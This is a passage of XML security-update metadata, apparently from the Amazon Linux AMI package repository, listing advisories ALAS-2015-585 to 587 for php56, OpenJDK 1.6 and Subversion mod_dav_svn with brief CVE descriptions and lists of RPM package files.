arch="i686"><filename>Packages/php55-enchant-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.28-1.106.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-585</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-585: medium priority package update for php56</title><issued date="2015-08-17 12:46:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.12-1.116.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-586</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-586: important priority package update for java-1.6.0-openjdk</title><issued date="2015-08-24 22:26:00" /><updated date="2015-08-24 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them to decrypt all traffic.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1526.html" title="" id="RHSA-2015:1526" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-587</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-587: medium priority package update for subversion mod_dav_svn</title><issued date="2015-08-24 22:27:00" /><updated date="2015-08-24 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0251:
It was found that the mod_dav_svn module did not properly validate the svn:author property of certain requests. An attacker able to create new revisions could use this flaw to spoof the svn:author property.
1205140:
CVE-2015-0251 subversion: (mod_dav_svn) spoofing svn:author property values for new revisions
CVE-2015-0248:
An assertion failure flaw was found in the way the SVN server processed certain requests with dynamically evaluated revision numbers. A remote attacker could use this flaw to cause the SVN server (both svnserve and httpd with the mod_dav_svn module) to crash.
1205138:
CVE-2015-0248 subversion: (mod_dav_svn) remote denial of service with certain requests with dynamically evaluated revision numbers
CVE-2015-0202:
The mod_dav_svn server in Subversion 1.8.0 through 1.8.11 allows remote attackers to cause a denial of service (memory consumption) via a large number of REPORT requests, which trigger the traversal of FSFS repository nodes.
1205134:
CVE-2015-0202 subversion: (mod_dav_svn) remote denial of service with certain REPORT requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0202" title="" id="CVE-2015-0202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0248" title="" id="CVE-2015-0248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0251" title="" id="CVE-2015-0251" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.8.13" release="7.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.13-7.50.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.13" release="7.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.13-7.50.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.13" release="7.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.13-7.50.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.13" release="7.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.13-7.50.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.13" release="7.52.amzn1" epoch="0" 